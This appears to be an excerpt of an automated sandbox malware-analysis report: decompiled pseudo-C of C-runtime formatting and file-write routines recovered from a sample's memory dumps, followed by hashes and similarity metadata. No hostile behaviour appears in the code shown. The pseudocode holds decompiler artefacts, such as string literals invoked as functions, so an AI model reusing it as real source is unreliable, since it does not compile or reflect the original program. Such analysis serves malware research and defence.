                                                                                                                            				goto 0xf8a7d40a;
                                                                                                                            				r12d = _t574 + _t574 * 4;
                                                                                                                            				r12d = _t574 - 0x18;
                                                                                                                            				r12d = _t456 + _t574 * 2;
                                                                                                                            				goto 0xf8a7d40a;
                                                                                                                            				r12d = r10d;
                                                                                                                            				goto 0xf8a7d40a;
                                                                                                                            				if (r15b != 0x2a) goto 0xf8a7d559;
                                                                                                                            				_t257 = _t585[2];
                                                                                                                            				 *(_t538 + 0x54) = _t257;
                                                                                                                            				if (_t257 >= 0) goto 0xf8a7d40a;
                                                                                                                            				r14d = r14d | 0x00000004;
                                                                                                                            				goto 0xf8a7d56a;
                                                                                                                            				 *(_t538 + 0x54) = _t456 + 0x341041fd2;
                                                                                                                            				goto 0xf8a7d40a;
                                                                                                                            				if (r15b == 0x20) goto 0xf8a7d5ba;
                                                                                                                            				if (r15b == 0x23) goto 0xf8a7d5b0;
                                                                                                                            				if (r15b == 0x2b) goto 0xf8a7d5a7;
                                                                                                                            				if (r15b == 0x2d) goto 0xf8a7d59e;
                                                                                                                            				if (r15b != 0x30) goto 0xf8a7d40a;
                                                                                                                            				r14d = r14d | 0x00000008;
                                                                                                                            				goto 0xf8a7d40a;
                                                                                                                            				r14d = r14d | 0x00000004;
                                                                                                                            				goto 0xf8a7d40a;
                                                                                                                            				r14d = r14d | 0x00000001;
                                                                                                                            				goto 0xf8a7d40a;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				goto 0xf8a7d40a;
                                                                                                                            				r14d = r14d | 0x00000002;
                                                                                                                            				goto 0xf8a7d40a;
                                                                                                                            				 *(_t538 + 0x78) = r10d;
                                                                                                                            				 *(_t538 + 0x5c) = r10d;
                                                                                                                            				 *(_t538 + 0x54) = r10d;
                                                                                                                            				 *(_t538 + 0x48) = r10d;
                                                                                                                            				r14d = r10d;
                                                                                                                            				r12d = r8d;
                                                                                                                            				 *(_t538 + 0x50) = r10d;
                                                                                                                            				goto 0xf8a7d40a;
                                                                                                                            				if (_t309 == 0) goto 0xf8a7d608;
                                                                                                                            				if (_t309 == 7) goto 0xf8a7d608;
                                                                                                                            				_t263 = E0000025B25BF8A7B89C(_t456);
                                                                                                                            				 *_t456 = 0x16;
                                                                                                                            				E0000025B25BF8A7BEC4(_t263);
                                                                                                                            				r10d = 0;
                                                                                                                            				goto 0xf8a7d60a;
                                                                                                                            				if ( *((intOrPtr*)(_t535 - 0x40)) == r10b) goto 0xf8a7d61b;
                                                                                                                            				 *( *((intOrPtr*)(_t535 - 0x48)) + 0xc8) =  *( *((intOrPtr*)(_t535 - 0x48)) + 0xc8) & 0xfffffffd;
                                                                                                                            				return E0000025B25BF8A81A50(_t456 + _t456 * 4, _t472,  *(_t535 + 0x1d8) ^ _t538,  *((intOrPtr*)(_t538 + 0x68)),  &(_t527[0]), _t532, _t535, _t574);
                                                                                                                            			}
                                                                                                                            0x25bf8a7cf02
                                                                                                                            0x25bf8a7cf07
                                                                                                                            0x25bf8a7cf0b
                                                                                                                            0x25bf8a7cf13
                                                                                                                            0x25bf8a7cf18
                                                                                                                            0x25bf8a7cf1d
                                                                                                                            0x25bf8a7cf1f
                                                                                                                            0x25bf8a7cf27
                                                                                                                            0x25bf8a7cf2d
                                                                                                                            0x25bf8a7cf35
                                                                                                                            0x25bf8a7cf3c
                                                                                                                            0x25bf8a7cf41
                                                                                                                            0x25bf8a7cf49
                                                                                                                            0x25bf8a7cf4d
                                                                                                                            0x25bf8a7cf51
                                                                                                                            0x25bf8a7cf55
                                                                                                                            0x25bf8a7cf5b
                                                                                                                            0x25bf8a7cf61
                                                                                                                            0x25bf8a7cf67
                                                                                                                            0x25bf8a7cf6f
                                                                                                                            0x25bf8a7cf78
                                                                                                                            0x25bf8a7cf7d
                                                                                                                            0x25bf8a7cf86
                                                                                                                            0x25bf8a7cf8f
                                                                                                                            0x25bf8a7cf98
                                                                                                                            0x25bf8a7cf9d
                                                                                                                            0x25bf8a7cfa6
                                                                                                                            0x25bf8a7cfaf
                                                                                                                            0x25bf8a7cfb8
                                                                                                                            0x25bf8a7cfba
                                                                                                                            0x25bf8a7cfc0
                                                                                                                            0x25bf8a7cfc8
                                                                                                                            0x25bf8a7cfd0
                                                                                                                            0x25bf8a7cfd5
                                                                                                                            0x25bf8a7cfdd
                                                                                                                            0x25bf8a7cfe0
                                                                                                                            0x25bf8a7cfe7
                                                                                                                            0x25bf8a7cfee
                                                                                                                            0x25bf8a7cff2
                                                                                                                            0x25bf8a7cff6
                                                                                                                            0x25bf8a7cffb
                                                                                                                            0x25bf8a7d001
                                                                                                                            0x25bf8a7d00b
                                                                                                                            0x25bf8a7d00f
                                                                                                                            0x25bf8a7d018
                                                                                                                            0x25bf8a7d01c
                                                                                                                            0x25bf8a7d025
                                                                                                                            0x25bf8a7d029
                                                                                                                            0x25bf8a7d02b
                                                                                                                            0x25bf8a7d034
                                                                                                                            0x25bf8a7d036
                                                                                                                            0x25bf8a7d039
                                                                                                                            0x25bf8a7d03b
                                                                                                                            0x25bf8a7d043
                                                                                                                            0x25bf8a7d048
                                                                                                                            0x25bf8a7d04d
                                                                                                                            0x25bf8a7d057
                                                                                                                            0x25bf8a7d059
                                                                                                                            0x25bf8a7d05c
                                                                                                                            0x25bf8a7d05e
                                                                                                                            0x25bf8a7d060
                                                                                                                            0x25bf8a7d068
                                                                                                                            0x25bf8a7d06d
                                                                                                                            0x25bf8a7d071
                                                                                                                            0x25bf8a7d080
                                                                                                                            0x25bf8a7d083
                                                                                                                            0x25bf8a7d08d
                                                                                                                            0x25bf8a7d08f
                                                                                                                            0x25bf8a7d094
                                                                                                                            0x25bf8a7d096
                                                                                                                            0x25bf8a7d09e
                                                                                                                            0x25bf8a7d0a0
                                                                                                                            0x25bf8a7d0a9
                                                                                                                            0x25bf8a7d0b0
                                                                                                                            0x25bf8a7d0b2
                                                                                                                            0x25bf8a7d0b7
                                                                                                                            0x25bf8a7d0bd
                                                                                                                            0x25bf8a7d0bf
                                                                                                                            0x25bf8a7d0c3
                                                                                                                            0x25bf8a7d0c5
                                                                                                                            0x25bf8a7d0c9
                                                                                                                            0x25bf8a7d0d2
                                                                                                                            0x25bf8a7d0d7
                                                                                                                            0x25bf8a7d0dc
                                                                                                                            0x25bf8a7d0e1
                                                                                                                            0x25bf8a7d0e4
                                                                                                                            0x25bf8a7d0e6
                                                                                                                            0x25bf8a7d0eb
                                                                                                                            0x25bf8a7d0f3
                                                                                                                            0x25bf8a7d0f5
                                                                                                                            0x25bf8a7d0fb
                                                                                                                            0x25bf8a7d0fd
                                                                                                                            0x25bf8a7d104
                                                                                                                            0x25bf8a7d108
                                                                                                                            0x25bf8a7d110
                                                                                                                            0x25bf8a7d11a
                                                                                                                            0x25bf8a7d11e
                                                                                                                            0x25bf8a7d125
                                                                                                                            0x25bf8a7d12a
                                                                                                                            0x25bf8a7d12f
                                                                                                                            0x25bf8a7d13f
                                                                                                                            0x25bf8a7d13f
                                                                                                                            0x25bf8a7d145
                                                                                                                            0x25bf8a7d147
                                                                                                                            0x25bf8a7d14a
                                                                                                                            0x25bf8a7d14f
                                                                                                                            0x25bf8a7d151
                                                                                                                            0x25bf8a7d156
                                                                                                                            0x25bf8a7d15d
                                                                                                                            0x25bf8a7d15f
                                                                                                                            0x25bf8a7d162
                                                                                                                            0x25bf8a7d169
                                                                                                                            0x25bf8a7d171
                                                                                                                            0x25bf8a7d173
                                                                                                                            0x25bf8a7d176
                                                                                                                            0x25bf8a7d17f
                                                                                                                            0x25bf8a7d183
                                                                                                                            0x25bf8a7d186
                                                                                                                            0x25bf8a7d18b
                                                                                                                            0x25bf8a7d191
                                                                                                                            0x25bf8a7d193
                                                                                                                            0x25bf8a7d199
                                                                                                                            0x25bf8a7d19e
                                                                                                                            0x25bf8a7d1a9
                                                                                                                            0x25bf8a7d1ab
                                                                                                                            0x25bf8a7d1ab
                                                                                                                            0x25bf8a7d1b6
                                                                                                                            0x25bf8a7d1bb
                                                                                                                            0x25bf8a7d1bf
                                                                                                                            0x25bf8a7d1c2
                                                                                                                            0x25bf8a7d1c4
                                                                                                                            0x25bf8a7d1c9
                                                                                                                            0x25bf8a7d1cb
                                                                                                                            0x25bf8a7d1d1
                                                                                                                            0x25bf8a7d1dc
                                                                                                                            0x25bf8a7d1e4
                                                                                                                            0x25bf8a7d1e7
                                                                                                                            0x25bf8a7d1eb
                                                                                                                            0x25bf8a7d1f5
                                                                                                                            0x25bf8a7d1f8
                                                                                                                            0x25bf8a7d204
                                                                                                                            0x25bf8a7d20f
                                                                                                                            0x25bf8a7d214
                                                                                                                            0x25bf8a7d21f
                                                                                                                            0x25bf8a7d224
                                                                                                                            0x25bf8a7d22d
                                                                                                                            0x25bf8a7d23a
                                                                                                                            0x25bf8a7d240
                                                                                                                            0x25bf8a7d244
                                                                                                                            0x25bf8a7d24d
                                                                                                                            0x25bf8a7d25a
                                                                                                                            0x25bf8a7d25f
                                                                                                                            0x25bf8a7d261
                                                                                                                            0x25bf8a7d266
                                                                                                                            0x25bf8a7d26c
                                                                                                                            0x25bf8a7d271
                                                                                                                            0x25bf8a7d274
                                                                                                                            0x25bf8a7d27d
                                                                                                                            0x25bf8a7d283
                                                                                                                            0x25bf8a7d287
                                                                                                                            0x25bf8a7d289
                                                                                                                            0x25bf8a7d28e
                                                                                                                            0x25bf8a7d290
                                                                                                                            0x25bf8a7d295
                                                                                                                            0x25bf8a7d29b
                                                                                                                            0x25bf8a7d29d
                                                                                                                            0x25bf8a7d2a7
                                                                                                                            0x25bf8a7d2ab
                                                                                                                            0x25bf8a7d2b1
                                                                                                                            0x25bf8a7d2b3
                                                                                                                            0x25bf8a7d2b8
                                                                                                                            0x25bf8a7d2d1
                                                                                                                            0x25bf8a7d2df
                                                                                                                            0x25bf8a7d2f7
                                                                                                                            0x25bf8a7d2fc
                                                                                                                            0x25bf8a7d305
                                                                                                                            0x25bf8a7d30b
                                                                                                                            0x25bf8a7d319
                                                                                                                            0x25bf8a7d323
                                                                                                                            0x25bf8a7d327
                                                                                                                            0x25bf8a7d32b
                                                                                                                            0x25bf8a7d330
                                                                                                                            0x25bf8a7d33f
                                                                                                                            0x25bf8a7d34b
                                                                                                                            0x25bf8a7d350
                                                                                                                            0x25bf8a7d355
                                                                                                                            0x25bf8a7d35c
                                                                                                                            0x25bf8a7d373
                                                                                                                            0x25bf8a7d378
                                                                                                                            0x25bf8a7d37d
                                                                                                                            0x25bf8a7d382
                                                                                                                            0x25bf8a7d389
                                                                                                                            0x25bf8a7d393
                                                                                                                            0x25bf8a7d397
                                                                                                                            0x25bf8a7d3aa
                                                                                                                            0x25bf8a7d3af
                                                                                                                            0x25bf8a7d3b4
                                                                                                                            0x25bf8a7d3bd
                                                                                                                            0x25bf8a7d3c3
                                                                                                                            0x25bf8a7d3d1
                                                                                                                            0x25bf8a7d3d6
                                                                                                                            0x25bf8a7d3d9

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                                                                            • String ID: $@
                                                                                                                            • API String ID: 3318157856-1077428164
                                                                                                                            • Opcode ID: ed96f0972bd3634f2cb84389868e4d8d838c71ba02ca3a0da481af1314c55da3
                                                                                                                            • Instruction ID: 9222cab5a1537683154aa514240b8a6ceb917ecb3e13f427ae40821ac413bca9
                                                                                                                            • Opcode Fuzzy Hash: ed96f0972bd3634f2cb84389868e4d8d838c71ba02ca3a0da481af1314c55da3
                                                                                                                            • Instruction Fuzzy Hash: D352F273208E8486FF668B14DD4C36E6BA0F7417A6F341205FE5616EDCD738C942AB68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _errnowrite_multi_char$Locale_invalid_parameter_noinfowrite_charwrite_string$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2950348734-3916222277
                                                                                                                            • Opcode ID: ea3213b9682e98405a1615abe1ce07939885694a526b1c47d1212e38588b1968
                                                                                                                            • Instruction ID: c5b22717aaf19f21a2baf421a7eaed5de2e363b312c4b6f0ddf1d35b2af1825a
                                                                                                                            • Opcode Fuzzy Hash: ea3213b9682e98405a1615abe1ce07939885694a526b1c47d1212e38588b1968
                                                                                                                            • Instruction Fuzzy Hash: FF62FB32A18E498AFF6A9B18CC4936977D1FB97326F34011DF4A7C39E1D734D8028659
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 61%
                                                                                                                            			E0000025B25BF8A80144(void* __ebx, signed long long __ecx, void* __edx, signed int __esi, void* __rax, long long __rbx, char* __rdx, void* __r10, void* __r11) {
                                                                                                                            				void* __rdi;
                                                                                                                            				void* __rsi;
                                                                                                                            				void* __rbp;
                                                                                                                            				void* __r12;
                                                                                                                            				void* __r13;
                                                                                                                            				void* _t189;
                                                                                                                            				void* _t197;
                                                                                                                            				intOrPtr _t198;
                                                                                                                            				signed int _t205;
                                                                                                                            				signed int _t209;
                                                                                                                            				char _t219;
                                                                                                                            				signed int _t225;
                                                                                                                            				signed int _t231;
                                                                                                                            				signed int _t235;
                                                                                                                            				intOrPtr _t239;
                                                                                                                            				signed int _t249;
                                                                                                                            				intOrPtr _t261;
                                                                                                                            				char _t265;
                                                                                                                            				void* _t300;
                                                                                                                            				void* _t301;
                                                                                                                            				void* _t302;
                                                                                                                            				signed long long _t369;
                                                                                                                            				signed long long _t370;
                                                                                                                            				intOrPtr _t373;
                                                                                                                            				intOrPtr* _t394;
                                                                                                                            				signed int* _t396;
                                                                                                                            				signed long long _t398;
                                                                                                                            				intOrPtr* _t399;
                                                                                                                            				signed short* _t401;
                                                                                                                            				signed short* _t402;
                                                                                                                            				intOrPtr _t404;
                                                                                                                            				intOrPtr _t416;
                                                                                                                            				intOrPtr* _t427;
                                                                                                                            				intOrPtr _t440;
                                                                                                                            				signed long long _t454;
                                                                                                                            				void* _t456;
                                                                                                                            				char* _t457;
                                                                                                                            				char* _t458;
                                                                                                                            				short* _t461;
                                                                                                                            				signed int* _t462;
                                                                                                                            				void* _t466;
                                                                                                                            				void* _t467;
                                                                                                                            				void* _t469;
                                                                                                                            				signed long long _t470;
                                                                                                                            				void* _t482;
                                                                                                                            				signed long long _t484;
                                                                                                                            				void* _t486;
                                                                                                                            				signed long long _t488;
                                                                                                                            				signed long long _t490;
                                                                                                                            				intOrPtr* _t491;
                                                                                                                            				signed short* _t492;
                                                                                                                            				void* _t496;
                                                                                                                            				char* _t497;
                                                                                                                            				void* _t499;
                                                                                                                            
                                                                                                                            				_t481 = __r11;
                                                                                                                            				_t438 = __rdx;
                                                                                                                            				 *((long long*)(_t469 + 0x20)) = __rbx;
                                                                                                                            				_t467 = _t469 - 0x1a30;
                                                                                                                            				E0000025B25BF8A7A9C0(0x1b30, __rax, __r10, __r11);
                                                                                                                            				_t470 = _t469 - __rax;
                                                                                                                            				_t369 =  *0xf8a9c990; // 0x18002eb3c
                                                                                                                            				_t370 = _t369 ^ _t470;
                                                                                                                            				 *(_t467 + 0x1a20) = _t370;
                                                                                                                            				r15d = r8d;
                                                                                                                            				_t497 = __rdx;
                                                                                                                            				 *(_t470 + 0x48) =  *(_t470 + 0x48) & 0;
                                                                                                                            				_t398 = __ecx;
                                                                                                                            				if (r8d != 0) goto 0xf8a80195;
                                                                                                                            				goto 0xf8a80856;
                                                                                                                            				if (__rdx != 0) goto 0xf8a801b9;
                                                                                                                            				E0000025B25BF8A7B82C(_t370);
                                                                                                                            				 *_t370 =  *_t370 & 0;
                                                                                                                            				_t189 = E0000025B25BF8A7B89C(_t370);
                                                                                                                            				 *_t370 = 0x16;
                                                                                                                            				E0000025B25BF8A7BEC4(_t189);
                                                                                                                            				goto 0xf8a80856;
                                                                                                                            				_t488 = _t398 >> 5;
                                                                                                                            				r12d = r12d & 0x0000001f;
                                                                                                                            				_t404 =  *((intOrPtr*)(0xf8aa3200 + _t488 * 8));
                                                                                                                            				 *(_t470 + 0x50) = _t488;
                                                                                                                            				_t484 = _t398 * 0x58;
                                                                                                                            				sil =  *(_t484 + _t404 + 0x38);
                                                                                                                            				sil = sil + sil;
                                                                                                                            				sil = sil >> 1;
                                                                                                                            				if (_t456 - 1 - 1 > 0) goto 0xf8a801f6;
                                                                                                                            				if (( !r15d & 0x00000001) == 0) goto 0xf8a8019a;
                                                                                                                            				if (( *(_t484 + _t404 + 8) & 0x00000020) == 0) goto 0xf8a8020b;
                                                                                                                            				_t18 = _t438 + 2; // 0x2
                                                                                                                            				r8d = _t18;
                                                                                                                            				E0000025B25BF8A8191C(__ebx, __ebx, 0xf8aa3200, _t398, __rdx, _t456);
                                                                                                                            				if (E0000025B25BF8A82D3C(__ebx, 0, 0xf8aa3200) == 0) goto 0xf8a804d6;
                                                                                                                            				_t373 =  *((intOrPtr*)(0xf8aa3200 + _t488 * 8));
                                                                                                                            				if (( *(_t484 + 0x25bf8aa3208) & 0x00000080) == 0) goto 0xf8a804d6;
                                                                                                                            				_t197 = E0000025B25BF8A7F654(_t373);
                                                                                                                            				_t249 = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t373 + 0xc0)) + 0x138)) == _t398;
                                                                                                                            				"ntdll.dll"();
                                                                                                                            				if (_t197 == 0) goto 0xf8a804d6;
                                                                                                                            				if (_t249 == 0) goto 0xf8a80278;
                                                                                                                            				if (sil == 0) goto 0xf8a804d6;
                                                                                                                            				_t198 = E0000025B25BF8A8B800(_t197, _t249, __ebx, 0, __esi, _t301, _t302, sil, 0xf8aa3200,  *((intOrPtr*)(_t484 +  *((intOrPtr*)(0xf8aa3200 + _t488 * 8)))), _t470 + 0x5c, _t454, _t456, _t481, _t488);
                                                                                                                            				 *(_t470 + 0x58) =  *(_t470 + 0x58) & 0;
                                                                                                                            				_t399 = _t497;
                                                                                                                            				 *((intOrPtr*)(_t470 + 0x5c)) = _t198;
                                                                                                                            				if (r15d == 0) goto 0xf8a804cd;
                                                                                                                            				if (sil != 0) goto 0xf8a8041f;
                                                                                                                            				_t265 =  *_t399;
                                                                                                                            				 *(_t470 + 0x44) = 0 | _t265 == 0x0000000a;
                                                                                                                            				_t440 =  *((intOrPtr*)(0xf8aa3200 + _t488 * 8));
                                                                                                                            				if ( *(_t484 + _t440 + 0x50) == 0) goto 0xf8a802dc;
                                                                                                                            				 *((char*)(_t470 + 0x61)) = _t265;
                                                                                                                            				r8d = 2;
                                                                                                                            				 *((char*)(_t470 + 0x60)) =  *((intOrPtr*)(_t484 + _t440 + 0x4c));
                                                                                                                            				 *(_t484 + _t440 + 0x50) =  *(_t484 + _t440 + 0x50) & 0x00000000;
                                                                                                                            				goto 0xf8a80325;
                                                                                                                            				if (E0000025B25BF8A831D8(_t265,  *(_t484 + _t440 + 0x50), 0xf8aa3200, _t470 + 0x60) == 0) goto 0xf8a8031c;
                                                                                                                            				if (_t499 - _t399 + _t497 - 1 <= 0) goto 0xf8a804a3;
                                                                                                                            				r8d = 2;
                                                                                                                            				if (E0000025B25BF8A84AE4(_t265, _t499) == 0xffffffff) goto 0xf8a804c4;
                                                                                                                            				goto 0xf8a80338;
                                                                                                                            				r8d = 1;
                                                                                                                            				if (E0000025B25BF8A84AE4(_t265, _t496) == 0xffffffff) goto 0xf8a804c4;
                                                                                                                            				 *(_t470 + 0x38) =  *(_t470 + 0x38) & 0x00000000;
                                                                                                                            				 *(_t470 + 0x30) =  *(_t470 + 0x30) & 0x00000000;
                                                                                                                            				r9d = 1;
                                                                                                                            				 *((intOrPtr*)(_t470 + 0x28)) = 5;
                                                                                                                            				_t401 = _t399 + 2;
                                                                                                                            				 *(_t470 + 0x20) = _t470 + 0x60;
                                                                                                                            				_t205 = E0000025B25BF8A8B910(_t204, _t249,  *((intOrPtr*)(_t470 + 0x5c)), 0, __esi, _t301, _t470 + 0x60, _t454, _t456, _t481, _t488);
                                                                                                                            				r13d = _t205;
                                                                                                                            				if (_t205 == 0) goto 0xf8a804c4;
                                                                                                                            				 *(_t470 + 0x20) =  *(_t470 + 0x20) & 0x00000000;
                                                                                                                            				r8d = r13d;
                                                                                                                            				if ( *0xf8a8b6f8(_t454, _t456, _t466) == 0) goto 0xf8a807de;
                                                                                                                            				if ( *(_t470 + 0x58) - r13d < 0) goto 0xf8a804c4;
                                                                                                                            				if ( *(_t470 + 0x44) == 0) goto 0xf8a80494;
                                                                                                                            				 *(_t470 + 0x20) =  *(_t470 + 0x20) & 0x00000000;
                                                                                                                            				 *((char*)(_t470 + 0x60)) = 0xd;
                                                                                                                            				r8d = 1;
                                                                                                                            				if ( *0xf8a8b6f8() == 0) goto 0xf8a807de;
                                                                                                                            				if ( *(_t470 + 0x58) - 1 < 0) goto 0xf8a804c4;
                                                                                                                            				 *(_t470 + 0x48) =  *(_t470 + 0x48) + 1;
                                                                                                                            				goto 0xf8a80494;
                                                                                                                            				if (_t456 - 1 - 1 > 0) goto 0xf8a80444;
                                                                                                                            				_t209 =  *_t401 & 0x0000ffff;
                                                                                                                            				r13d = 0;
                                                                                                                            				 *(_t470 + 0x40) = _t209;
                                                                                                                            				r13b = _t209 == 0xa;
                                                                                                                            				_t402 =  &(_t401[1]);
                                                                                                                            				 *(_t470 + 0x44) = r13d;
                                                                                                                            				goto 0xf8a80449;
                                                                                                                            				r13d =  *(_t470 + 0x44);
                                                                                                                            				if (_t456 - 1 - 1 > 0) goto 0xf8a8048f;
                                                                                                                            				if (E0000025B25BF8A84AEC( *(_t470 + 0x40) & 0x0000ffff, _t486) !=  *(_t470 + 0x40)) goto 0xf8a807de;
                                                                                                                            				if (r13d == 0) goto 0xf8a8048f;
                                                                                                                            				 *(_t470 + 0x40) = 0xd;
                                                                                                                            				if (E0000025B25BF8A84AEC(0xd, _t482) !=  *(_t470 + 0x40)) goto 0xf8a807de;
                                                                                                                            				 *(_t470 + 0x48) =  *(_t470 + 0x48) + 1;
                                                                                                                            				_t490 =  *(_t470 + 0x50);
                                                                                                                            				if (_t249 - r14d - r15d >= 0) goto 0xf8a804c4;
                                                                                                                            				goto 0xf8a80292;
                                                                                                                            				 *((char*)(_t484 +  *((intOrPtr*)(0xf8aa3200 + _t490 * 8)) + 0x4c)) =  *_t402;
                                                                                                                            				 *(_t484 +  *((intOrPtr*)(0xf8aa3200 + _t490 * 8)) + 0x50) = 1;
                                                                                                                            				goto 0xf8a807e6;
                                                                                                                            				goto 0xf8a807ea;
                                                                                                                            				_t416 =  *((intOrPtr*)(0xf8aa3200 + _t490 * 8));
                                                                                                                            				if (( *(_t484 + _t416 + 8) & 0x00000080) == 0) goto 0xf8a807b8;
                                                                                                                            				_t491 = _t497;
                                                                                                                            				 *(_t470 + 0x44) = 0;
                                                                                                                            				if (sil != 0) goto 0xf8a805c7;
                                                                                                                            				if (r15d == 0) goto 0xf8a80816;
                                                                                                                            				_t115 =  &(_t402[6]); // 0xd
                                                                                                                            				_t457 = _t467 + 0x620;
                                                                                                                            				if (r13d - r14d - r15d >= 0) goto 0xf8a80549;
                                                                                                                            				_t219 =  *_t491;
                                                                                                                            				_t492 = _t491 + 1;
                                                                                                                            				if (_t219 != 0xa) goto 0xf8a80538;
                                                                                                                            				 *_t457 = _t115;
                                                                                                                            				_t458 = _t457 + 1;
                                                                                                                            				 *_t458 = _t219;
                                                                                                                            				if (_t416 + 2 - 0x13ff < 0) goto 0xf8a80518;
                                                                                                                            				 *(_t470 + 0x20) =  *(_t470 + 0x20) & 0x00000000;
                                                                                                                            				r8d = __esi;
                                                                                                                            				r8d = r8d - _t219;
                                                                                                                            				 *(_t470 + 0x48) =  *(_t470 + 0x48) + 1;
                                                                                                                            				if ( *0xf8a8b6f8() == 0) goto 0xf8a807de;
                                                                                                                            				if ( *((intOrPtr*)(_t470 + 0x4c)) - _t458 + 1 - _t467 + 0x620 < 0) goto 0xf8a807e6;
                                                                                                                            				if (r13d - r14d - r15d < 0) goto 0xf8a8050b;
                                                                                                                            				goto 0xf8a807e6;
                                                                                                                            				if (sil != 2) goto 0xf8a806a6;
                                                                                                                            				if (r15d == 0) goto 0xf8a80816;
                                                                                                                            				_t461 = _t467 + 0x620;
                                                                                                                            				if (r13d - r14d - r15d >= 0) goto 0xf8a80628;
                                                                                                                            				_t225 =  *_t492 & 0x0000ffff;
                                                                                                                            				if (_t225 != 0xa) goto 0xf8a80614;
                                                                                                                            				 *_t461 = 0xd;
                                                                                                                            				_t462 = _t461 + 2;
                                                                                                                            				 *_t462 = _t225;
                                                                                                                            				if ( *((intOrPtr*)(_t484 +  *((intOrPtr*)(0xf8aa3200 +  *(_t470 + 0x50) * 8)))) + 4 - 0x13fe < 0) goto 0xf8a805ec;
                                                                                                                            				 *(_t470 + 0x20) =  *(_t470 + 0x20) & 0x00000000;
                                                                                                                            				r8d = __esi;
                                                                                                                            				r8d = r8d - _t225;
                                                                                                                            				 *(_t470 + 0x48) =  *(_t470 + 0x48) + 2;
                                                                                                                            				if ( *0xf8a8b6f8() == 0) goto 0xf8a807de;
                                                                                                                            				if ( *((intOrPtr*)(_t470 + 0x4c)) -  &(_t462[0]) - _t467 + 0x620 < 0) goto 0xf8a807e6;
                                                                                                                            				if (r13d - r14d - r15d < 0) goto 0xf8a805df;
                                                                                                                            				goto 0xf8a807e6;
                                                                                                                            				if (r15d == 0) goto 0xf8a80816;
                                                                                                                            				r8d = 0xd;
                                                                                                                            				_t427 = _t470 + 0x70;
                                                                                                                            				if (r13d - r14d - r15d >= 0) goto 0xf8a806f6;
                                                                                                                            				_t231 = _t492[1] & 0x0000ffff;
                                                                                                                            				if (_t231 != 0xa) goto 0xf8a806e2;
                                                                                                                            				 *_t427 = r8w;
                                                                                                                            				 *(_t427 + 2) = _t231;
                                                                                                                            				if (_t467 + 0x624 - 0x6a8 < 0) goto 0xf8a806bc;
                                                                                                                            				 *(_t470 + 0x38) =  *(_t470 + 0x38) & 0x00000000;
                                                                                                                            				 *(_t470 + 0x30) =  *(_t470 + 0x30) & 0x00000000;
                                                                                                                            				 *((intOrPtr*)(_t470 + 0x28)) = 0xd55;
                                                                                                                            				asm("cdq");
                                                                                                                            				r9d = 0 - _t231 >> 1;
                                                                                                                            				 *(_t470 + 0x20) = _t467 + 0x620;
                                                                                                                            				_t235 = E0000025B25BF8A8B910(0 - _t231 >> 1,  *(_t470 + 0x44), 0xfde9, 0, __esi, _t301, _t467 + 0x620, _t454,  &(_t462[0]) - _t467 + 0x620, _t481,  &(_t492[2]));
                                                                                                                            				 *(_t470 + 0x44) = _t235;
                                                                                                                            				if (_t235 == 0) goto 0xf8a807de;
                                                                                                                            				 *(_t470 + 0x20) =  *(_t470 + 0x20) & 0x00000000;
                                                                                                                            				r8d = _t235;
                                                                                                                            				_t394 =  *(_t470 + 0x50);
                                                                                                                            				r8d = r8d;
                                                                                                                            				if ( *0xf8a8b6f8() == 0) goto 0xf8a80791;
                                                                                                                            				_t300 = 0 +  *((intOrPtr*)(_t470 + 0x4c));
                                                                                                                            				if ( *(_t470 + 0x44) - _t300 > 0) goto 0xf8a80747;
                                                                                                                            				goto 0xf8a8079d;
                                                                                                                            				"\\%s: %d"();
                                                                                                                            				if ( *(_t470 + 0x44) - _t300 > 0) goto 0xf8a807e6;
                                                                                                                            				r8d = 0xd;
                                                                                                                            				if (r13d - r14d - r15d < 0) goto 0xf8a806b5;
                                                                                                                            				goto 0xf8a807e6;
                                                                                                                            				 *(_t470 + 0x20) =  *(_t470 + 0x20) & _t454;
                                                                                                                            				r8d = r15d;
                                                                                                                            				_t239 =  *0xf8a8b6f8();
                                                                                                                            				if (_t239 == 0) goto 0xf8a807de;
                                                                                                                            				goto 0xf8a807e6;
                                                                                                                            				"\\%s: %d"();
                                                                                                                            				_t261 = _t239;
                                                                                                                            				if ( *((intOrPtr*)(_t470 + 0x4c)) != 0) goto 0xf8a80850;
                                                                                                                            				if (_t261 == 0) goto 0xf8a80816;
                                                                                                                            				if (_t261 != 5) goto 0xf8a8080a;
                                                                                                                            				E0000025B25BF8A7B89C(_t394);
                                                                                                                            				 *_t394 = 9;
                                                                                                                            				E0000025B25BF8A7B82C(_t394);
                                                                                                                            				 *_t394 = _t261;
                                                                                                                            				goto 0xf8a801b1;
                                                                                                                            				E0000025B25BF8A7B84C(_t261, _t394, _t402);
                                                                                                                            				goto 0xf8a801b1;
                                                                                                                            				_t396 =  *((intOrPtr*)(0xf8aa3200 +  *(_t470 + 0x50) * 8));
                                                                                                                            				if (( *( &(_t396[2]) + _t484) & 0x00000040) == 0) goto 0xf8a80838;
                                                                                                                            				if ( *_t497 == 0x1a) goto 0xf8a8018e;
                                                                                                                            				E0000025B25BF8A7B89C(_t396);
                                                                                                                            				 *_t396 = 0x1c;
                                                                                                                            				E0000025B25BF8A7B82C(_t396);
                                                                                                                            				 *_t396 =  *_t396 & 0x00000000;
                                                                                                                            				goto 0xf8a801b1;
